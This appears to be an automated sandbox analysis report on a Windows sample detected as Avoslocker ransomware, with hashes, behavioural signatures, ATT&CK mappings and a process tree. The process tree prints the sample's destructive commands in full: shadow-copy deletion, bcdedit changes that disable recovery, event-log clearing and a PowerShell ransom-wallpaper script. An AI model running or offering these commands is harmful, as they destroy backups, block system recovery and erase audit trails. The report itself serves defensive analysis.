Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 14:53
Static task
static1
Behavioral task
behavioral1
Sample
testing.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
testing.exe
Resource
win10v2004-20241007-en
General
-
Target
testing.exe
-
Size
1.1MB
-
MD5
690e61850169e3c202bd420ff5f09657
-
SHA1
0cea717bfa2ca24a6ed31060ac32ddb8a01e1369
-
SHA256
fa8740e57fe41b3f13eca9c22a81eab37a157255e78d1090543a5f3f991dbbfe
-
SHA512
2cfe7f675a976c214e0b28fa761bd473d0b6e93f2447091018484be0d19ad0c4852adfb1606aac55ac4979feefac33389e1168fcac151f557098ebe446d5d14a
-
SSDEEP
24576:SImw98okVgela0as5CqLVO7XJCjkD3N0HRA:8L5ljasaU
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1060 bcdedit.exe 4700 bcdedit.exe -
Renames multiple (8494) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation testing.exe -
Executes dropped EXE 1 IoCs
pid Process 4824 P1kAlMiG2Kb7.scr -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI P1kAlMiG2Kb7.scr -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: P1kAlMiG2Kb7.scr -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\341933339.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\identity_proxy\identity_helper.Sparse.Stable.msix.DATA P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Common Files\System\msadc\it-IT\msdaremr.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\en_get.svg P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-125.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\vlc.mo P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\QUAD\QUAD.INF P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4 P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\dom.md P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\he.pak.DATA P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail.scale-125.png P1kAlMiG2Kb7.scr File created C:\Program Files\Common Files\microsoft shared\ink\zh-CN\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\ECHO.ELM P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms P1kAlMiG2Kb7.scr File created C:\Program Files\Common Files\microsoft shared\TextConv\en-US\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-US.pak.DATA P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md P1kAlMiG2Kb7.scr File created C:\Program Files\Java\jdk-1.8\jre\lib\management\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hu-HU\tipresx.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main.css P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-sl\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Exchange.scale-200.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\EXPEDITN.INF P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\index.win32.stats.json P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt\msipc.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeWideTile.scale-100.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-32.png P1kAlMiG2Kb7.scr File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-ppd.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrespsh.dat P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred.xml P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Ion Boardroom.thmx P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pl.pak.DATA P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pl-pl\ui-strings.js P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hr-HR\tipresx.dll.mui P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription5-ul-oob.xrm-ms P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\7-Zip\Lang\th.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui P1kAlMiG2Kb7.scr File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\GET_YOUR_FILES_BACK.txt P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp P1kAlMiG2Kb7.scr File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\en-US.pak P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxAccountsSplashLogo.scale-100.png P1kAlMiG2Kb7.scr File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt P1kAlMiG2Kb7.scr -
pid Process 3628 powershell.exe 13752 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language P1kAlMiG2Kb7.scr -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1064 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4824 P1kAlMiG2Kb7.scr 4824 P1kAlMiG2Kb7.scr 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 13752 powershell.exe 13752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4824 P1kAlMiG2Kb7.scr Token: SeIncreaseQuotaPrivilege 4416 WMIC.exe Token: SeSecurityPrivilege 4416 WMIC.exe Token: SeTakeOwnershipPrivilege 4416 WMIC.exe Token: SeLoadDriverPrivilege 4416 WMIC.exe Token: SeSystemProfilePrivilege 4416 WMIC.exe Token: SeSystemtimePrivilege 4416 WMIC.exe Token: SeProfSingleProcessPrivilege 4416 WMIC.exe Token: SeIncBasePriorityPrivilege 4416 WMIC.exe Token: SeCreatePagefilePrivilege 4416 WMIC.exe Token: SeBackupPrivilege 4416 WMIC.exe Token: SeRestorePrivilege 4416 WMIC.exe Token: SeShutdownPrivilege 4416 WMIC.exe Token: SeDebugPrivilege 4416 WMIC.exe Token: SeSystemEnvironmentPrivilege 4416 WMIC.exe Token: SeRemoteShutdownPrivilege 4416 WMIC.exe Token: SeUndockPrivilege 4416 WMIC.exe Token: SeManageVolumePrivilege 4416 WMIC.exe Token: 33 4416 WMIC.exe Token: 34 4416 WMIC.exe Token: 35 4416 WMIC.exe Token: 36 4416 WMIC.exe Token: SeBackupPrivilege 38076 vssvc.exe Token: SeRestorePrivilege 38076 vssvc.exe Token: SeAuditPrivilege 38076 vssvc.exe Token: SeIncreaseQuotaPrivilege 4416 WMIC.exe Token: SeSecurityPrivilege 4416 WMIC.exe Token: SeTakeOwnershipPrivilege 4416 WMIC.exe Token: SeLoadDriverPrivilege 4416 WMIC.exe Token: SeSystemProfilePrivilege 4416 WMIC.exe Token: SeSystemtimePrivilege 4416 WMIC.exe Token: SeProfSingleProcessPrivilege 4416 WMIC.exe Token: SeIncBasePriorityPrivilege 4416 WMIC.exe Token: SeCreatePagefilePrivilege 4416 WMIC.exe Token: SeBackupPrivilege 4416 WMIC.exe Token: SeRestorePrivilege 4416 WMIC.exe Token: SeShutdownPrivilege 4416 WMIC.exe Token: SeDebugPrivilege 4416 WMIC.exe Token: SeSystemEnvironmentPrivilege 4416 WMIC.exe Token: SeRemoteShutdownPrivilege 4416 WMIC.exe Token: SeUndockPrivilege 4416 WMIC.exe Token: SeManageVolumePrivilege 4416 WMIC.exe Token: 33 4416 WMIC.exe Token: 34 4416 WMIC.exe Token: 35 4416 WMIC.exe Token: 36 4416 WMIC.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeSecurityPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeSecurityPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe Token: SeSecurityPrivilege 3628 powershell.exe Token: SeBackupPrivilege 3628 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2116 wrote to memory of 4824 2116 testing.exe 83 PID 2116 wrote to memory of 4824 2116 testing.exe 83 PID 2116 wrote to memory of 4824 2116 testing.exe 83 PID 4824 wrote to memory of 3348 4824 P1kAlMiG2Kb7.scr 85 PID 4824 wrote to memory of 3348 4824 P1kAlMiG2Kb7.scr 85 PID 4824 wrote to memory of 2148 4824 P1kAlMiG2Kb7.scr 86 PID 4824 wrote to memory of 2148 4824 P1kAlMiG2Kb7.scr 86 PID 4824 wrote to memory of 2204 4824 P1kAlMiG2Kb7.scr 87 PID 4824 wrote to memory of 2204 4824 P1kAlMiG2Kb7.scr 87 PID 4824 wrote to memory of 1544 4824 P1kAlMiG2Kb7.scr 88 PID 4824 wrote to memory of 1544 4824 P1kAlMiG2Kb7.scr 88 PID 4824 wrote to memory of 3516 4824 P1kAlMiG2Kb7.scr 89 PID 4824 wrote to memory of 3516 4824 P1kAlMiG2Kb7.scr 89 PID 3348 wrote to memory of 4416 3348 cmd.exe 90 PID 3348 wrote to memory of 4416 3348 cmd.exe 90 PID 2204 wrote to memory of 4700 2204 cmd.exe 91 PID 2204 wrote to memory of 4700 2204 cmd.exe 91 PID 2148 wrote to memory of 1064 2148 cmd.exe 92 PID 2148 wrote to memory of 1064 2148 cmd.exe 92 PID 1544 wrote to memory of 1060 1544 cmd.exe 93 PID 1544 wrote to memory of 1060 1544 cmd.exe 93 PID 3516 wrote to memory of 3628 3516 cmd.exe 95 PID 3516 wrote to memory of 3628 3516 cmd.exe 95 PID 4824 wrote to memory of 13752 4824 P1kAlMiG2Kb7.scr 99 PID 4824 wrote to memory of 13752 4824 P1kAlMiG2Kb7.scr 99 PID 13752 wrote to memory of 19376 13752 powershell.exe 101 PID 13752 wrote to memory of 19376 13752 powershell.exe 101 PID 13752 wrote to memory of 18740 13752 powershell.exe 104 PID 13752 wrote to memory of 18740 13752 powershell.exe 104 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\testing.exe"C:\Users\Admin\AppData\Local\Temp\testing.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr"C:\Users\Admin\AppData\Local\Temp\P1kAlMiG2Kb7.scr" /S2⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SYSTEM32\cmd.execmd /c wmic shadowcopy delete /nointeractive3⤵
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet3⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:1064
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} recoveryenabled No3⤵
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:4700
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:1060
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"Z:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:13752 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\341933339.png /f4⤵
- Sets desktop wallpaper using registry
PID:19376
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False4⤵PID:18740
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:38076
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
807KB
MD5e27b5291c8fb2dfdeb7f16bb6851df5e
SHA140207f83b601cd60905c1f807ac0889c80dfe33f
SHA256ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f
SHA5122ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848